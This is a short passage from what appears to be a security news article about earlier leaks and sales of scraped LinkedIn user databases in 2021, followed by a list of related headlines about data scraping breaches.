This however is not the first time when LinkedIn’s scrapped database has been leaked online. In April 2021, a threat actor was selling 2 scraped LinkedIn databases with 500 million and 827 million records. In June 2021, a hacker sold a scrapped LinkedIn database containing data of 700 million users.

****_RELATED ARTICLES_****

1.  **Hackers Posed as Israelis in Targeted LinkedIn Phishing Attack**
2.  **Twitter Scraping Breach: 209M Accounts Leaked on Hacker Forum**
3.  **API Misuse: Hacker Exposes 2.6M Duolingo Users’ Emails & Names**
4.  **Meta Fined €265 million in Facebook Data Scraping Case in the EU**
5.  **Data scraping firm leaks 235m Instagram, TikTok, YouTube user data**

Tag

#bios